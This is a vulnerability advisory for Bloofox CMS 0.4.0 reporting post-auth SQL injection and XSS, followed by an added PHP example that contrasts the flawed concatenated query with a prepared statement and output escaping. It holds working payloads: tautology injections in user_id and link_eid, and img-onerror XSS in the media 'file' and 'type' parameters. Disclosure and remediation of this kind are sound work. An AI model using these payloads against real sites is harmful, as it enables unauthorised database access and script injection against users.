# TITLE ....... # Multiple Post-auth sql injection/xss in Bloofox CMS 0.4.0 .... #
# DATE ........ # 08.03.2012
# AUTHOR ...... # http://hauntit.blogspot.com
# SOFT LINK ... # http://www.bloofox.com/
# VERSION ..... # 0.4.0
# TESTED ON ... # LAMP
# .............................................................................. #
# 1. What is this?
# 2. What is the type of vulnerability?
# 3. Where is bug :)
# 4. More...
#............................................#
# 1. What is this?
This is a very nice CMS. You should try it! ;)
#............................................#
# 2. What is the type of vulnerability?
This is an SQL injection bug, but the important fact is that this vulnerability
can only be triggered by an 'editor'-role user.
#............................................#
# 3. Where is bug :)
# A) sqli
Log in as an 'editor'-role user.
http://bloofoxCMS_0.4.0/admin/index.php?page=profiles&user_id=;'
And here is the view from the source code:
...cut...
bloofoxCMS_0.4.0/admin$ grep -n -r -e "uid" ./ | grep -e "\\$"| grep GET
./include/inc_user_user.php:152: $db->query("SELECT * FROM ".$tbl_prefix."sys_user WHERE uid = '".$_GET['userid']."' ORDER BY uid LIMIT 1");
./include/inc_user_user.php:210: $db->query("SELECT uid,username FROM ".$tbl_prefix."sys_user WHERE uid = '".$_GET['userid']."' ORDER BY uid LIMIT 1");
...cut...
Try this:
&user_id=2' or '1'%3d'2
&user_id=2' or '2'%3d'2
;)
#............................................#
# B) sqli-02
...cut from Burp...
POST /www/lastz/bloofoxcms/bloofoxCMS_0.4.0/admin/index.php?mode=content&action=new HTTP/1.1
Host: localhost
(...)
Connection: close
name=AAAAAAAA3&link_type=3&link_url=&link_eid=1'%20and%20password%20%3d%20'1'%20or%20'1'%3d'1'&link_plugin=3&insert=1&insert_where=0&link_target=&link_param=&blocked=0&invisible=0&startdate=&enddate=&keywords=&description=&template_id=0&send=Add+Page
...cut from Burp...
Vulnerable parameter is link_eid.
This command should help you find the vulnerable code:
@bloofoxCMS_0.4.0/admin$ grep -n -r -e link_eid ./
Other vulnerable parameters include "insert" and "eid".
#............................................#
# C) xss
All parameters are vulnerable to XSS too.
#............................................#
# D) xss-02
http://bloofoxCMS_0.4.0/admin/index.php?mode=content&page=media&action=edit&file=%22%2f%3E%3Cimg%20src%3ddef%20onerror%3daBlert%2812312312323%29%3E%3C&type=1
http://bloofoxCMS_0.4.0/admin/index.php?mode=content&page=media&action=edit&file=de.gif&type=%22}}%27%22%3E%3Cimg%20src%3ddef%20onerror%3daBlert%2812312312323%29%3E
Vulnerable parameters: 'file'.
Some more sqli you should find here too:
When you are updating your profile (as an editor) at /admin/index.php?page=myprofile
try these parameters for test attacks: showemail, gender, be_lang, be_tmpl
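As an added example (not Bloofox code), here is the concatenation pattern quoted from inc_user_user.php in section 3A placed beside a hardened form, plus the output-side escaping that closes the XSS in section 3C. It runs against a constructed in-memory SQLite table; the table prefix, the column set and the availability of pdo_sqlite are assumptions.

```php
<?php
// Constructed fixture: two users in a table shaped like sys_user.
$tbl_prefix = 'bf_';
$pdo = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$pdo->exec("CREATE TABLE {$tbl_prefix}sys_user (uid INTEGER PRIMARY KEY, username TEXT)");
$pdo->exec("INSERT INTO {$tbl_prefix}sys_user VALUES (1, 'admin'), (2, 'editor')");

// Vulnerable shape (as quoted in section 3A): the raw GET value is
// concatenated straight into the SQL string.
function fetchUserUnsafe(PDO $pdo, string $tbl_prefix, string $rawUid): ?array {
    $sql = "SELECT * FROM {$tbl_prefix}sys_user WHERE uid = '{$rawUid}' ORDER BY uid LIMIT 1";
    $row = $pdo->query($sql)->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Hardened form: validate the type first, then bind the value with a
// prepared statement instead of building the query by concatenation.
function fetchUserSafe(PDO $pdo, string $tbl_prefix, string $rawUid): ?array {
    $uid = filter_var($rawUid, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($uid === false) {
        return null;                      // rejected before it reaches the database
    }
    $stmt = $pdo->prepare("SELECT * FROM {$tbl_prefix}sys_user WHERE uid = :uid ORDER BY uid LIMIT 1");
    $stmt->execute([':uid' => $uid]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Output-side fix for the 'file' parameter (section 3C): escape before
// echoing into an attribute so quotes and angle brackets stay inert text.
function attr(string $value): string {
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// The tautology from section 3A: with concatenation the WHERE clause is
// always true, so LIMIT 1 hands back the first row rather than the caller's.
$payload = "2' or '2'='2";
var_dump(fetchUserUnsafe($pdo, $tbl_prefix, $payload));
// The same input fails integer validation and never becomes a query.
var_dump(fetchUserSafe($pdo, $tbl_prefix, $payload));
// A well-formed id still works through the bound query.
var_dump(fetchUserSafe($pdo, $tbl_prefix, '2'));
// The media-edit 'file' value rendered as an attribute, now harmless markup text.
echo '<input name="file" value="' . attr('"/><img src=def onerror=aBlert(1)>') . '">', PHP_EOL;
```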
#............................................#
# 4. More...
- http://hauntit.blogspot.com
- http://www.google.com
- http://portswigger.net
#............................................#
# Best regards
#